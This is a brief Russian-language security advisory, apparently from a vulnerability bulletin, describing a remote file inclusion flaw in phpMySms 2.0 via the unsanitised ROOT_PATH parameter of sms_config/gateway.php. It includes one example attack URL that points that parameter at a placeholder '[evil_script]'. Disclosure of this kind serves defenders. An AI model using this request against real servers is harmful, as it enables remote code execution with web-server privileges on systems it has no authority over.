Программа: phpMySms 2.0, возможно другие версии.
 
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных в параметре "ROOT_PATH" в сценарии gateway.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера.

Пример:

http://[site]/[sms location]/sms_config/gateway.php?ROOT_PATH=[evil_script]

Оставить мнение